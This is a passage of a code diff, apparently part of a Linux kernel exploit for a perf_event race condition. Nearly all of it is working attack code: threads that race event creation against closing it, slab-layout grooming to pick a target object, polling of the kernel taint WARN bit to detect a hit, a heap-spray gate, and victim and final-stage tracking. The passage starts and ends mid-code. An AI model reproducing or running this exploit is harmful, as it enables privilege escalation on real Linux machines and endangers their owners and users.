TP_FAIL_ORACLE_NO_VICTIM: + return "oracle_no_victim"; + case TP_FAIL_ORACLE_BAD_INDEX: + return "oracle_bad_index"; + case TP_FAIL_FINAL_FAILED: + return "final_failed"; + default: + return "unknown"; + } +} + +static void tp_apply_profile_for_round(struct tp_run_cfg *cfg, int round) +{ + if (!cfg) + return; + + if (round <= 1) { + cfg->tries_per_round = TP_FIXED_TRIES_PER_ROUND; + cfg->warn_wake_predelay_ns = TP_FIXED_WARN_WAKE_PREDELAY_NS; + cfg->profile_name = "A"; + return; + } + + cfg->tries_per_round = TP_PROFILE_B_TRIES_PER_ROUND; + cfg->warn_wake_predelay_ns = TP_PROFILE_B_WARN_WAKE_PREDELAY_NS; + cfg->profile_name = "B"; +} + +static void tp_log_stage_summary(void) +{ + int warn_hit = __atomic_load_n(&tp_warn_hit, __ATOMIC_ACQUIRE); + int race_success = __atomic_load_n(&tp_race_success, __ATOMIC_ACQUIRE); + int oracle_hit = __atomic_load_n(&tp_oracle_hit, __ATOMIC_ACQUIRE); + int victim_idx = __atomic_load_n(&tp_victim_msg_idx, __ATOMIC_ACQUIRE); + int final_entered = __atomic_load_n(&tp_final_stage_entered, __ATOMIC_ACQUIRE); + int final_result = __atomic_load_n(&tp_final_result, __ATOMIC_ACQUIRE); + int fail_reason = __atomic_load_n(&tp_fail_reason, __ATOMIC_ACQUIRE); + + log_info("warn_hit=%d race_success=%d oracle_hit=%d victim_msg_idx=%d final_stage_entered=%d final_result=%d fail_reason=%s", + warn_hit, race_success, oracle_hit, victim_idx, final_entered, final_result, + tp_fail_reason_string(fail_reason)); +} + +static char *tp_build_filter_expr(int terms) +{ + size_t cap; + size_t off = 0; + char *expr; + + if (terms <= 0) + return NULL; + + if (terms > 8192) + terms = 8192; + + cap = (size_t)terms * 28 + 64; + expr = (char *)calloc(1, cap); + if (!expr) + return NULL; + + off += (size_t)snprintf(expr + off, cap - off, "("); + for (int i = 0; i < terms; i++) { + off += (size_t)snprintf(expr + off, cap - off, + "common_pid==-1%d||", i % 10); + if (off >= cap) + break; + } + (void)snprintf(expr + off, cap - off, "common_pid>=0)"); + + return expr; +} + +static int tp_create_target_event_common(int event_id, const char *filter_expr, + pid_t pid, int noisy) +{ + struct perf_event_attr pe; + int fd; + + memset(&pe, 0, sizeof(pe)); + pe.type = PERF_TYPE_TRACEPOINT; + pe.size = sizeof(pe); + pe.config = event_id; + pe.disabled = 1; + pe.exclude_kernel = 1; + pe.exclude_hv = 1; + pe.remove_on_exec = 1; + pe.sigtrap = 1; + pe.sample_period = 1; + pe.sample_type = PERF_SAMPLE_IP; + + fd = (int)perf_event_open(&pe, pid, -1, -1, PERF_FLAG_FD_CLOEXEC); + if (fd < 0) { + if (noisy) + log_warn("[tp] perf_event_open failed: errno=%d (%s)", errno, strerror(errno)); + return -1; + } + + if (filter_expr) { + if (ioctl(fd, PERF_EVENT_IOC_SET_FILTER, filter_expr) != 0) { + if (noisy) + log_warn("[tp] PERF_EVENT_IOC_SET_FILTER failed: %s", strerror(errno)); + close(fd); + return -1; + } + } + + if (ioctl(fd, PERF_EVENT_IOC_ENABLE, 0) != 0) { + if (noisy) + log_warn("[tp] PERF_EVENT_IOC_ENABLE failed: %s", strerror(errno)); + close(fd); + return -1; + } + + return fd; +} + +static int tp_create_target_event(int event_id, const char *filter_expr, pid_t pid) +{ + return tp_create_target_event_common(event_id, filter_expr, pid, 1); +} + +static void tp_prime_event_allocator_best_effort(const struct tp_attempt_ctx *ctx) +{ + int fd; + + if (!ctx) + return; + + fd = tp_create_target_event_common(ctx->event_id, ctx->filter_expr, 0, 0); + if (fd < 0) + return; + + (void)ioctl(fd, PERF_EVENT_IOC_DISABLE, 0); + (void)syscall(SYS_close, fd); +} + +static int tp_disable_and_close_if_open_ret(volatile int *fdp) +{ + int fd = __atomic_exchange_n(fdp, -1, __ATOMIC_ACQ_REL); + + if (fd >= 0) { + (void)ioctl(fd, PERF_EVENT_IOC_DISABLE, 0); + (void)syscall(SYS_close, fd); + } + + return fd; +} + +static void tp_wait_target_slot_rcu(int wait_us) +{ + if (wait_us < 0) + wait_us = 0; + + /* Close->reuse relies on RCU progress; a short sleep after barrier is safer. */ + user_synchronize_rcu(); + if (wait_us > 0) + usleep((useconds_t)wait_us); + user_synchronize_rcu(); +} + +static int tp_prepare_target_slot_for_attempt(int slot_idx, int rcu_wait_us) +{ + int old_fd; + + if (slot_idx < 0 || slot_idx >= TOTAL_OBJS) + return -1; + + old_fd = total_fds[slot_idx]; + if (old_fd >= 0) { + (void)syscall(SYS_close, old_fd); + total_fds[slot_idx] = -1; + + if (target_perf_fd == old_fd) + target_perf_fd = -1; + } + + tp_wait_target_slot_rcu(rcu_wait_us); + return 0; +} + +static struct tp_sched_cfg tp_build_sched_cfg(int mode) +{ + struct tp_sched_cfg cfg; + + memset(&cfg, 0, sizeof(cfg)); + cfg.worker_cpu = 0; + cfg.closer_cpu = 1; + cfg.worker_policy = SCHED_OTHER; + cfg.worker_prio = 0; + cfg.closer_policy = SCHED_OTHER; + cfg.closer_prio = 0; + cfg.hog_policy = SCHED_FIFO; + cfg.hog_prio = 90; + + if (mode == 1) { + cfg.worker_cpu = 0; + cfg.closer_cpu = 1; + cfg.closer_policy = SCHED_FIFO; + cfg.closer_prio = 70; + } else if (mode == 2) { + cfg.worker_cpu = 0; + cfg.closer_cpu = 0; + cfg.worker_policy = SCHED_FIFO; + cfg.worker_prio = 70; + cfg.closer_policy = SCHED_FIFO; + cfg.closer_prio = 60; + } + + return cfg; +} + +static void *tp_attempt_worker_thread(void *arg) +{ + struct tp_attempt_ctx *ctx = (struct tp_attempt_ctx *)arg; + struct timespec timeout; + int fd; + + tp_set_thread_affinity(ctx->sched.worker_cpu); + tp_set_thread_sched_best_effort("worker", ctx->sched.worker_policy, + ctx->sched.worker_prio, ctx->verbose); + + tp_futex_word = 0; + + if (ctx->do_prime) + tp_prime_event_allocator_best_effort(ctx); + + fd = tp_create_target_event(ctx->event_id, ctx->filter_expr, 0); + if (fd < 0) { + __atomic_store_n(&ctx->event_failed, 1, __ATOMIC_RELEASE); + __atomic_store_n(&ctx->start_close, 1, __ATOMIC_RELEASE); + return NULL; + } + + if (ctx->target_slot_idx >= 0 && ctx->target_slot_idx < TOTAL_OBJS) { + total_fds[ctx->target_slot_idx] = fd; + target_perf_fd = fd; + (void)ioctl(fd, PERF_EVENT_IOC_ID, &target_perf_id); + } + + __atomic_store_n(&tp_perf_fd, fd, __ATOMIC_RELEASE); + __atomic_store_n(&ctx->event_ready, 1, __ATOMIC_RELEASE); + + while (!__atomic_load_n(&ctx->closer_ready, __ATOMIC_ACQUIRE)) + tp_cpu_relax_once(); + if (ctx->hog_ns > 0) { + while (!__atomic_load_n(&ctx->hog_ready, __ATOMIC_ACQUIRE)) + tp_cpu_relax_once(); + } + + ctx->t_worker_write_ns = get_time_ns(); + __atomic_store_n(&ctx->start_close, 1, __ATOMIC_RELEASE); + + timeout.tv_sec = ctx->futex_timeout_ms / 1000; + timeout.tv_nsec = (ctx->futex_timeout_ms % 1000) * 1000000L; + + ctx->sigtrap_before_wait = (int)__atomic_load_n(&tp_sigtrap_count, __ATOMIC_ACQUIRE); + ctx->t_before_futex_wait_ns = get_time_ns(); + __atomic_store_n(&ctx->wait_armed, 1, __ATOMIC_RELEASE); + + errno = 0; + ctx->futex_ret = (int)do_futex(&tp_futex_word, FUTEX_WAIT, 0, &timeout, NULL, 0); + ctx->futex_errno = errno; + + ctx->t_after_futex_wait_ns = get_time_ns(); + ctx->sigtrap_after_wait = (int)__atomic_load_n(&tp_sigtrap_count, __ATOMIC_ACQUIRE); + ctx->t_last_sigtrap_ns = __atomic_load_n(&tp_last_sigtrap_ns, __ATOMIC_ACQUIRE); + + return NULL; +} + +static void *tp_attempt_closer_thread(void *arg) +{ + struct tp_attempt_ctx *ctx = (struct tp_attempt_ctx *)arg; + + tp_set_thread_affinity(ctx->sched.closer_cpu); + tp_set_thread_sched_best_effort("closer", ctx->sched.closer_policy, + ctx->sched.closer_prio, ctx->verbose); + + __atomic_store_n(&ctx->closer_ready, 1, __ATOMIC_RELEASE); + + while (!__atomic_load_n(&ctx->event_ready, __ATOMIC_ACQUIRE) && + !__atomic_load_n(&ctx->event_failed, __ATOMIC_ACQUIRE)) + tp_cpu_relax_once(); + + if (__atomic_load_n(&ctx->event_failed, __ATOMIC_ACQUIRE)) + return NULL; + + while (!__atomic_load_n(&ctx->start_close, __ATOMIC_ACQUIRE)) + tp_cpu_relax_once(); + + tp_spin_delay_ns((uint64_t)ctx->delay_ns); + + ctx->t_closer_close_ns = get_time_ns(); + { + int closed_fd = tp_disable_and_close_if_open_ret(&tp_perf_fd); + + if (ctx->target_slot_idx >= 0 && ctx->target_slot_idx < TOTAL_OBJS) { + if (total_fds[ctx->target_slot_idx] == closed_fd) + total_fds[ctx->target_slot_idx] = -1; + if (target_perf_fd == closed_fd) + target_perf_fd = -1; + } + } + + for (int spins = 0; spins < TP_FIXED_WAKE_ARM_SPINS; spins++) { + if (__atomic_load_n(&ctx->wait_armed, __ATOMIC_ACQUIRE)) + break; + tp_cpu_relax_once(); + } + + if (TP_FIXED_POST_CLOSE_GRACE_NS > 0) + tp_spin_delay_ns((uint64_t)TP_FIXED_POST_CLOSE_GRACE_NS); + + if (TP_FIXED_WAKE_DELAY_NS > 0) + tp_spin_delay_ns((uint64_t)TP_FIXED_WAKE_DELAY_NS); + + { + long tainted_now = -1; + uint64_t poll_start = get_time_ns(); + int poll_reads = 0; + + while (1) { + poll_reads++; + if (tp_read_kernel_tainted(&tainted_now) == 0 && + tp_taint_warn_bit_set(tainted_now)) + break; + + if ((get_time_ns() - poll_start) >= TP_FIXED_PREWAKE_TAINT_POLL_MAX_NS) + break; + + if (TP_FIXED_PREWAKE_TAINT_POLL_STEP_NS > 0) + tp_spin_delay_ns((uint64_t)TP_FIXED_PREWAKE_TAINT_POLL_STEP_NS); + else + tp_cpu_relax_once(); + } + + ctx->taint_poll_reads = poll_reads; + ctx->taint_poll_ns = get_time_ns() - poll_start; + + if (tp_taint_warn_bit_set(tainted_now)) { + uint64_t hold_start = get_time_ns(); + + ctx->warn_seen_pre_wake = 1; + ctx->warn_seen_stage = 1; + if (!ctx->first_warn_detect_ns) + ctx->first_warn_detect_ns = hold_start; + tp_warn_open_gate_and_wait_spray(ctx, hold_start); + + ctx->warn_hold_ns = get_time_ns() - hold_start; + } + } + + tp_maybe_apply_warn_wake_hold(ctx); + + /* + * Try wake without flipping futex word first: this avoids forcing EAGAIN + * when waiter is about to enter FUTEX_WAIT but not queued yet. + */ + ctx->t_wake_ns = get_time_ns(); + if (ctx->first_warn_detect_ns > 0 && ctx->t_wake_ns >= ctx->first_warn_detect_ns) + ctx->warn_detect_to_first_wake_ns = ctx->t_wake_ns - ctx->first_warn_detect_ns; + errno = 0; + ctx->wake_ret = (int)do_futex(&tp_futex_word, FUTEX_WAKE, 1, NULL, NULL, 0); + ctx->wake_errno = errno; + ctx->wake_final_ret = ctx->wake_ret; + ctx->wake_final_errno = ctx->wake_errno; + ctx->wake_calls = 1; + if (ctx->wake_ret > 0) + ctx->wake_hit_total = ctx->wake_ret; + + for (int retry = 0; + retry < TP_FIXED_WAKE_RETRY_COUNT && ctx->wake_final_ret <= 0; + retry++) { + if (TP_FIXED_WAKE_RETRY_GAP_NS > 0) + tp_spin_delay_ns((uint64_t)TP_FIXED_WAKE_RETRY_GAP_NS); + + errno = 0; + ctx->wake_final_ret = (int)do_futex(&tp_futex_word, FUTEX_WAKE, 1, NULL, NULL, 0); + ctx->wake_final_errno = errno; + ctx->wake_calls++; + if (ctx->wake_final_ret > 0) + ctx->wake_hit_total += ctx->wake_final_ret; + } + + if (ctx->wake_final_ret <= 0 && TP_FIXED_LATE_WAKE_GRACE_NS > 0) + tp_spin_delay_ns((uint64_t)TP_FIXED_LATE_WAKE_GRACE_NS); + + if (ctx->wake_final_ret <= 0) { + errno = 0; + ctx->wake_final_ret = (int)do_futex(&tp_futex_word, FUTEX_WAKE, 1, NULL, NULL, 0); + ctx->wake_final_errno = errno; + ctx->wake_calls++; + if (ctx->wake_final_ret > 0) + ctx->wake_hit_total += ctx->wake_final_ret; + } + + if (ctx->wake_final_ret <= 0) { + int warn_late = ctx->warn_seen_pre_wake; + long tainted_late = -1; + uint64_t late_poll_start = get_time_ns(); + + while (!warn_late) { + ctx->late_taint_poll_reads++; + if (tp_read_kernel_tainted(&tainted_late) == 0 && + tp_taint_warn_bit_set(tainted_late)) { + warn_late = 1; + break; + } + + if ((get_time_ns() - late_poll_start) >= TP_FIXED_LATE_TAINT_POLL_MAX_NS) + break; + + if (TP_FIXED_LATE_TAINT_POLL_STEP_NS > 0) + tp_spin_delay_ns((uint64_t)TP_FIXED_LATE_TAINT_POLL_STEP_NS); + else + tp_cpu_relax_once(); + } + + if (warn_late) { + ctx->warn_seen_pre_wake = 1; + if (!ctx->warn_seen_stage) + ctx->warn_seen_stage = 2; + } else { + ctx->warn_seen_stage = 3; + } + + { + uint64_t hold_start = get_time_ns(); + + if (!ctx->first_warn_detect_ns) + ctx->first_warn_detect_ns = hold_start; + tp_warn_open_gate_and_wait_spray(ctx, hold_start); + if (!ctx->warn_hold_ns || ctx->warn_hold_ns < (get_time_ns() - hold_start)) + ctx->warn_hold_ns = get_time_ns() - hold_start; + tp_maybe_apply_warn_wake_hold(ctx); + + uint64_t extend_start = get_time_ns(); + while (ctx->wake_final_ret <= 0 && + (get_time_ns() - extend_start) < TP_FIXED_WARN_WAKE_EXTEND_MAX_NS) { + if (TP_FIXED_WARN_WAKE_EXTEND_GAP_NS > 0) + tp_spin_delay_ns((uint64_t)TP_FIXED_WARN_WAKE_EXTEND_GAP_NS); + else + tp_cpu_relax_once(); + + errno = 0; + ctx->wake_final_ret = (int)do_futex(&tp_futex_word, FUTEX_WAKE, 1, NULL, NULL, 0); + ctx->wake_final_errno = errno; + ctx->wake_calls++; + if (ctx->wake_final_ret > 0) + ctx->wake_hit_total += ctx->wake_final_ret; + } + } + } + + if (ctx->wake_final_ret <= 0) { + __atomic_store_n(&tp_futex_word, 1, __ATOMIC_RELEASE); + ctx->wake_store1_fallback = 1; + errno = 0; + ctx->wake_final_ret = (int)do_futex(&tp_futex_word, FUTEX_WAKE, 1, NULL, NULL, 0); + ctx->wake_final_errno = errno; + ctx->wake_calls++; + if (ctx->wake_final_ret > 0) + ctx->wake_hit_total += ctx->wake_final_ret; + } + + return NULL; +} + +static void *tp_attempt_hog_thread(void *arg) +{ + struct tp_attempt_ctx *ctx = (struct tp_attempt_ctx *)arg; + + tp_set_thread_affinity(ctx->sched.worker_cpu); + tp_set_thread_sched_best_effort("hog", ctx->sched.hog_policy, + ctx->sched.hog_prio, ctx->verbose); + + __atomic_store_n(&ctx->hog_ready, 1, __ATOMIC_RELEASE); + while (!__atomic_load_n(&ctx->start_close, __ATOMIC_ACQUIRE)) + tp_cpu_relax_once(); + + tp_spin_delay_ns((uint64_t)ctx->hog_ns); + return NULL; +} + +static int tp_run_one_attempt(const struct tp_run_cfg *cfg, + const char *filter_expr, + int *sigtrap_delta, + int64_t *close_minus_write_ns, + int *futex_ret_out, + int *futex_errno_out, + int *postwait_sigtrap_out, + int64_t *sigtrap_after_wait_ns_out, + int *wake_ret_out, + int *wake_errno_out, + int *wake_final_ret_out, + int *wake_final_errno_out, + int *wake_calls_out, + int *wake_hit_total_out, + int *wake_store1_fallback_out, + int *wake_warn_extend_used_out, + int64_t *wake_warn_extend_ns_out, + int *late_taint_poll_reads_out, + int64_t *futex_wait_ns_out, + int64_t *wake_to_futex_return_ns_out, + int64_t *wake_to_sigtrap_ns_out, + int *sigtrap_timing_out, + int *warn_seen_pre_wake_out, + int *warn_seen_stage_out, + int64_t *warn_hold_ns_out, + int64_t *warn_wake_predelay_ns_out, + int *warn_hold_applied_out, + int64_t *warn_hold_applied_ns_out, + int64_t *warn_detect_to_first_wake_ns_out, + int *spray_seen_pre_wake_out, + int *spray_gate_opened_out, + int *taint_poll_reads_out, + int64_t *taint_poll_ns_out, + int target_slot_idx) +{ + struct tp_attempt_ctx ctx; + pthread_t worker; + pthread_t closer; + pthread_t hog; + int hog_started = 0; + int sigtrap_start; + int sigtrap_end; + + memset(&ctx, 0, sizeof(ctx)); + ctx.delay_ns = cfg->delay_ns; + ctx.hog_ns = cfg->hog_ns; + ctx.futex_timeout_ms = cfg->futex_timeout_ms; + ctx.event_id = cfg->event_id; + ctx.filter_expr = filter_expr; + ctx.sched = tp_build_sched_cfg(cfg->mode); + ctx.warn_wake_predelay_target_ns = cfg->warn_wake_predelay_ns; + ctx.verbose = cfg->verbose; + ctx.do_prime = 0; + ctx.target_slot_idx = target_slot_idx; + ctx.futex_ret = -2; + ctx.futex_errno = 0; + ctx.wake_ret = -2; + ctx.wake_errno = 0; + ctx.wake_final_ret = -2; + ctx.wake_final_errno = 0; + ctx.wake_calls = 0; + ctx.wake_hit_total = 0; + ctx.wake_store1_fallback = 0; + ctx.wake_warn_extend_used = 0; + ctx.wake_warn_extend_ns = 0; + ctx.late_taint_poll_reads = 0; + + if (ctx.target_slot_idx < 0 || ctx.target_slot_idx >= TOTAL_OBJS) + return -6; + + __atomic_store_n(&tp_perf_fd, -1, __ATOMIC_RELEASE); + sigtrap_start = (int)__atomic_load_n(&tp_sigtrap_count, __ATOMIC_ACQUIRE); + + if (ctx.hog_ns > 0) { + if (pthread_create(&hog, NULL, tp_attempt_hog_thread, &ctx) != 0) + return -5; + hog_started = 1; + } + + if (pthread_create(&closer, NULL, tp_attempt_closer_thread, &ctx) != 0) { + if (hog_started) { + pthread_cancel(hog); + pthread_join(hog, NULL); + } + return -4; + } + + if (pthread_create(&worker, NULL, tp_attempt_worker_thread, &ctx) != 0) { + pthread_cancel(closer); + pthread_join(closer, NULL); + if (hog_started) { + pthread_cancel(hog); + pthread_join(hog, NULL); + } + return -3; + } + + pthread_join(worker, NULL); + pthread_join(closer, NULL); + if (hog_started) + pthread_join(hog, NULL); + + { + int cleanup_fd = tp_disable_and_close_if_open_ret(&tp_perf_fd); + + if (cleanup_fd >= 0) { + if (total_fds[ctx.target_slot_idx] == cleanup_fd) + total_fds[ctx.target_slot_idx] = -1; + if (target_perf_fd == cleanup_fd) + target_perf_fd = -1; + } + } + + if (ctx.event_failed) + return -2; + + sigtrap_end = (int)__atomic_load_n(&tp_sigtrap_count, __ATOMIC_ACQUIRE); + + if (sigtrap_delta) + *sigtrap_delta = sigtrap_end - sigtrap_start; + + if (close_minus_write_ns) { + if (ctx.t_closer_close_ns && ctx.t_worker_write_ns) + *close_minus_write_ns = + (int64_t)(ctx.t_closer_close_ns - ctx.t_worker_write_ns); + else + *close_minus_write_ns = 0; + } + + if (futex_ret_out) + *futex_ret_out = ctx.futex_ret; + if (futex_errno_out) + *futex_errno_out = ctx.futex_errno; + if (postwait_sigtrap_out) { + int d = ctx.sigtrap_after_wait - ctx.sigtrap_before_wait; + *postwait_sigtrap_out = d > 0 ? d : 0; + } + if (sigtrap_after_wait_ns_out) { + int64_t d = -1; + + if (ctx.sigtrap_after_wait > ctx.sigtrap_before_wait && + ctx.t_last_sigtrap_ns >= ctx.t_before_futex_wait_ns) + d = (int64_t)(ctx.t_last_sigtrap_ns - ctx.t_before_futex_wait_ns); + *sigtrap_after_wait_ns_out = d; + } + if (wake_ret_out) + *wake_ret_out = ctx.wake_ret; + if (wake_errno_out) + *wake_errno_out = ctx.wake_errno; + if (wake_final_ret_out) + *wake_final_ret_out = ctx.wake_final_ret; + if (wake_final_errno_out) + *wake_final_errno_out = ctx.wake_final_errno; + if (wake_calls_out) + *wake_calls_out = ctx.wake_calls; + if (wake_hit_total_out) + *wake_hit_total_out = ctx.wake_hit_total; + if (wake_store1_fallback_out) + *wake_store1_fallback_out = ctx.wake_store1_fallback; + if (wake_warn_extend_used_out) + *wake_warn_extend_used_out = ctx.wake_warn_extend_used; + if (wake_warn_extend_ns_out) + *wake_warn_extend_ns_out = (int64_t)ctx.wake_warn_extend_ns; + if (late_taint_poll_reads_out) + *late_taint_poll_reads_out = ctx.late_taint_poll_reads; + + if (futex_wait_ns_out) { + int64_t d = -1; + + if (ctx.t_after_futex_wait_ns >= ctx.t_before_futex_wait_ns) + d = (int64_t)(ctx.t_after_futex_wait_ns - ctx.t_before_futex_wait_ns); + *futex_wait_ns_out = d; + } + + if (wake_to_futex_return_ns_out) { + int64_t d = -1; + + if (ctx.t_wake_ns > 0 && ctx.t_after_futex_wait_ns >= ctx.t_wake_ns) + d = (int64_t)(ctx.t_after_futex_wait_ns - ctx.t_wake_ns); + *wake_to_futex_return_ns_out = d; + } + + if (wake_to_sigtrap_ns_out) { + int64_t d = -1; + + if (ctx.sigtrap_after_wait > ctx.sigtrap_before_wait && + ctx.t_wake_ns > 0 && + ctx.t_last_sigtrap_ns >= ctx.t_wake_ns) + d = (int64_t)(ctx.t_last_sigtrap_ns - ctx.t_wake_ns); + *wake_to_sigtrap_ns_out = d; + } + + if (sigtrap_timing_out) { + int timing = -1; + + if (ctx.sigtrap_after_wait > ctx.sigtrap_before_wait) { + if (ctx.t_last_sigtrap_ns >= ctx.t_before_futex_wait_ns && + ctx.t_last_sigtrap_ns <= ctx.t_after_futex_wait_ns) + timing = 0; + else if (ctx.t_last_sigtrap_ns > ctx.t_after_futex_wait_ns) + timing = 1; + } + *sigtrap_timing_out = timing; + } + + if (warn_seen_pre_wake_out) + *warn_seen_pre_wake_out = ctx.warn_seen_pre_wake; + if (warn_seen_stage_out) + *warn_seen_stage_out = ctx.warn_seen_stage; + if (warn_hold_ns_out) + *warn_hold_ns_out = (int64_t)ctx.warn_hold_ns; + if (warn_wake_predelay_ns_out) + *warn_wake_predelay_ns_out = (int64_t)ctx.warn_wake_predelay_ns; + if (warn_hold_applied_out) + *warn_hold_applied_out = ctx.warn_hold_applied; + if (warn_hold_applied_ns_out) + *warn_hold_applied_ns_out = (int64_t)ctx.warn_hold_applied_ns; + if (warn_detect_to_first_wake_ns_out) { + int64_t d = -1; + + if (ctx.first_warn_detect_ns > 0 && ctx.warn_detect_to_first_wake_ns > 0) + d = (int64_t)ctx.warn_detect_to_first_wake_ns; + *warn_detect_to_first_wake_ns_out = d; + } + if (spray_seen_pre_wake_out) + *spray_seen_pre_wake_out = ctx.spray_seen_pre_wake; + if (spray_gate_opened_out) + *spray_gate_opened_out = ctx.spray_gate_opened; + if (taint_poll_reads_out) + *taint_poll_reads_out = ctx.taint_poll_reads; + if (taint_poll_ns_out) + *taint_poll_ns_out = (int64_t)ctx.taint_poll_ns; + + return 0; +} + +void *tp_worker_thread(void *arg) +{ + (void)arg; + struct perf_event_attr pe; + struct sigaction sa; + struct tp_run_cfg cfg; + char *filter_expr = NULL; + uint64_t base_id = 0; + uint64_t target_id_wanted; + unsigned long attempt_seq = 0; + + tp_set_thread_affinity(0); + + memset(&sa, 0, sizeof(sa)); + sa.sa_sigaction = tp_sigtrap_handler; + sa.sa_flags = SA_SIGINFO; + sigemptyset(&sa.sa_mask); + if (sigaction(SIGTRAP, &sa, NULL) < 0) { + perror("sigaction(SIGTRAP)"); + __atomic_store_n(&tp_spray_gate, -1, __ATOMIC_RELEASE); + stop_threads = 1; + exit_threads = 1; + return NULL; + } + + memset(&cfg, 0, sizeof(cfg)); + cfg.event_id = TP_FIXED_EVENT_ID; + cfg.delay_ns = TP_FIXED_DELAY_NS; + cfg.tries_per_round = TP_FIXED_TRIES_PER_ROUND; + cfg.mode = TP_FIXED_MODE; + cfg.filter_terms = TP_FIXED_FILTER_TERMS; + cfg.futex_timeout_ms = TP_FIXED_FUTEX_TIMEOUT_MS; + cfg.hog_ns = TP_FIXED_HOG_NS; + cfg.verbose = TP_FIXED_VERBOSE; + cfg.drain_every_attempts = TP_FIXED_DRAIN_EVERY; + cfg.drain_sleep_us = TP_FIXED_DRAIN_SLEEP_US; + cfg.prime_every_attempts = TP_FIXED_PRIME_EVERY; + cfg.warn_wake_predelay_ns = TP_FIXED_WARN_WAKE_PREDELAY_NS; + cfg.profile_name = "A"; + + memset(&pe, 0, sizeof(pe)); + pe.type = PERF_TYPE_TRACEPOINT; + pe.size = sizeof(pe); + pe.config = cfg.event_id; + pe.disabled = 1; + pe.exclude_kernel = 1; + pe.exclude_hv = 1; + pe.sigtrap = 1; + pe.remove_on_exec = 1; + pe.sample_period = 1; + pe.sample_type = PERF_SAMPLE_IP; + + for (int i = 0; i < DRAIN_COUNT; i++) { + drain_fds[i] = perf_event_open(&pe, 0, -1, -1, PERF_FLAG_FD_CLOEXEC); + if (i == 0 && drain_fds[0] != -1) + (void)ioctl(drain_fds[0], PERF_EVENT_IOC_ID, &base_id); + } + + log_dbg("Config: Objs/Slab=%d, Target Slabs=%d, Base ID=%lu", + OBJS_PER_SLAB, TOTAL_OBJS / OBJS_PER_SLAB, base_id); + + for (int i = 0; i < TOTAL_OBJS; i++) { + total_fds[i] = perf_event_open(&pe, 0, -1, -1, PERF_FLAG_FD_CLOEXEC); + if (total_fds[i] == -1) + perror("perf_event_open"); + } + + target_id_wanted = base_id + DRAIN_COUNT + ((PADDINGS + 1) * OBJS_PER_SLAB) + 2; + + for (int i = 0; i < TOTAL_OBJS; i++) { + uint64_t id; + + if (total_fds[i] == -1) + continue; + (void)ioctl(total_fds[i], PERF_EVENT_IOC_ID, &id); + if (id == target_id_wanted) { + target_perf_id = id; + target_perf_fd = total_fds[i]; /* layout target: must stay tied to total_fds */ + perf_fd_idx = i; + break; + } + } + + if (target_perf_fd == -1 || perf_fd_idx < 0) { + log_warn("Could not find layout target perf event id=%lu", target_id_wanted); + __atomic_store_n(&tp_spray_gate, -1, __ATOMIC_RELEASE); + stop_threads = 1; + exit_threads = 1; + return NULL; + } + + log_info("layout target selected: idx=%d fd=%d id=%lu", + perf_fd_idx, target_perf_fd, target_perf_id); + + filter_expr = tp_build_filter_expr(cfg.filter_terms); + if (!filter_expr) { + log_warn("failed to build filter expr"); + __atomic_store_n(&tp_spray_gate, -1, __ATOMIC_RELEASE); + stop_threads = 1; + exit_threads = 1; + return NULL; + } + + log_info("race profile base: event=%d mode=%d filter=%d futex_to_ms=%d hog_ns=%d tries{A=%d,B=%d} warn_predelay_ns{A=%d,B=%d}", + cfg.event_id, cfg.mode, cfg.filter_terms, cfg.futex_timeout_ms, cfg.hog_ns, + TP_FIXED_TRIES_PER_ROUND, TP_PROFILE_B_TRIES_PER_ROUND, + TP_FIXED_WARN_WAKE_PREDELAY_NS, TP_PROFILE_B_WARN_WAKE_PREDELAY_NS); + log_info("wake staging: post_close_grace_ns=%d wake_delay_ns=%d wake_retry{count=%d,gap_ns=%d} late_wake_grace_ns=%d taint_poll{max_ns=%d,step_ns=%d} late_taint_poll{max_ns=%d,step_ns=%d} warn_extend{max_ns=%d,gap_ns=%d}", + TP_FIXED_POST_CLOSE_GRACE_NS, TP_FIXED_WAKE_DELAY_NS, + TP_FIXED_WAKE_RETRY_COUNT, TP_FIXED_WAKE_RETRY_GAP_NS, + TP_FIXED_LATE_WAKE_GRACE_NS, + TP_FIXED_PREWAKE_TAINT_POLL_MAX_NS, TP_FIXED_PREWAKE_TAINT_POLL_STEP_NS, + TP_FIXED_LATE_TAINT_POLL_MAX_NS, TP_FIXED_LATE_TAINT_POLL_STEP_NS, + TP_FIXED_WARN_WAKE_EXTEND_MAX_NS, TP_FIXED_WARN_WAKE_EXTEND_GAP_NS); + log_info("spray timing: gate_release_delay_ns=%llu phaseA=%d phaseB_base_ns=%d phaseB_step_ns=%d phaseB_steps=%d first_alloc_wait_ns=%llu done_wait_ns=%llu", + (unsigned long long)TP_GATE_RELEASE_DELAY_NS, + TP_SPRAY_PHASEA_COUNT, TP_SPRAY_PHASEB_BASE_DELAY_NS, + TP_SPRAY_PHASEB_STEP_NS, TP_SPRAY_PHASEB_STEPS, + (unsigned long long)TP_SPRAY_FIRST_ALLOC_WAIT_NS, + (unsigned long long)TP_SPRAY_DONE_WAIT_NS); + + for (int round = 1; round <= TP_MAX_ROUNDS; round++) { + tp_apply_profile_for_round(&cfg, round); + int round_hit = 0; + + log_info("race round %d/%d start profile=%s tries=%d warn_predelay_ns=%d", + round, TP_MAX_ROUNDS, cfg.profile_name, cfg.tries_per_round, + cfg.warn_wake_predelay_ns); + + for (int i = 1; i <= cfg.tries_per_round; i++) { + long taint_before = -1; + long taint_after = -1; + int taint_before_ok; + int taint_after_ok; + int before_warn; + int after_warn; + int hit; + int futex_ret = 0; + int futex_errno = 0; + int warn_seen_stage = 0; + int spray_gate_opened = 0; + + attempt_seq++; + if (tp_prepare_target_slot_for_attempt(perf_fd_idx, TP_FIXED_TARGET_SLOT_RCU_WAIT_US) != 0) { + if ((i % 100) == 0) + log_warn("attempt %d: failed to prepare target slot idx=%d", i, perf_fd_idx); + continue; + } + if (cfg.drain_every_attempts > 1) + tp_maybe_low_freq_drain(&cfg, attempt_seq); + + taint_before_ok = (tp_read_kernel_tainted(&taint_before) == 0); + before_warn = taint_before_ok ? tp_taint_warn_bit_set(taint_before) : -1; + + (void)tp_run_one_attempt(&cfg, filter_expr, NULL, NULL, + &futex_ret, &futex_errno, + NULL, NULL, + NULL, NULL, + NULL, NULL, + NULL, NULL, NULL, + NULL, NULL, NULL, + NULL, NULL, + NULL, NULL, + NULL, &warn_seen_stage, + NULL, NULL, + NULL, NULL, + NULL, + NULL, &spray_gate_opened, + NULL, NULL, + perf_fd_idx); + + taint_after_ok = (tp_read_kernel_tainted(&taint_after) == 0); + after_warn = taint_after_ok ? tp_taint_warn_bit_set(taint_after) : -1; + + if (!taint_before_ok || !taint_after_ok) { + if ((i % 100) == 0) + log_warn("attempt %d: tainted read failed", i); + continue; + } + + if 